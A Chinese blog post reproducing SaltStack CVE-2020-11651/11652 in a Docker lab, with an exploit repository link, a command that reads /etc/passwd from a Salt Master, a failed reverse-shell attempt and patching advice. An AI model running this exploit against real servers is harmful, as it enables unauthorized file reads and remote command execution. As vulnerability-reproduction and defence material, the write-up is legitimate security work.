• SaltStack远程命令执行漏洞复现(CVE-2020-11651、CVE-2020-11652)


    0x00 概述

    SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能。

    前段时间,国外某安全团队披露了SaltStack存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。

    在CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。

    在CVE-2020-11652目录遍历漏洞中,攻击者通过构造恶意请求,读取服务器上任意文件。

    0x01 影响版本

    SaltStack < 2019.2.4

    SaltStack < 3000.2

    0x02 环境搭建 

     使用docker搭建环境

    1.拉取镜像

    docker pull vulfocus/saltstack-cve_2020_11651
    

    2.运行环境

    docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651
    

    环境搭建成功

    0x03 漏洞复现

     github上公开exp很多,选择一个下载即可

    https://github.com/Imanfeng/SaltStack-Exp.git
    

    1.读取/etc/passwd文件

    python3 exp.py  --master 192.168.217.131 --read /etc/passwd
    

     2.反弹shell

    尝试很多办法,换了POC尝试反弹shell,但是都没有成功

    今天看到一篇文章,当受害主机中没有nc的情况,使用msfvenom生成木马文件,使用msf建立会话,尝试后仍然无果,后续再行研究

     

    0x03 修复方案

    1. 将SaltStack升级至安全版本以上,升级前建议做好快照备份。

    2. 设置SaltStack为自动更新,及时获取相应补丁。

    3. 将Salt Master默认监听端口(默认4505 和 4506)设置为禁止对公网开放,或仅对可信对象开放。

  • 相关阅读:
    servlet+jsp结合完成加法运算
    Servlet入门
    java之二叉树算法
    Session
    cookie
    jsp之jstl
    《HDAO》
    《Zoom An Image With Different Interpolation Types》
    《SSAO》
    《debug unreal engine code》
  • 原文地址:https://www.cnblogs.com/Cl0wn/p/12918432.html
Copyright © 2020-2023  润新知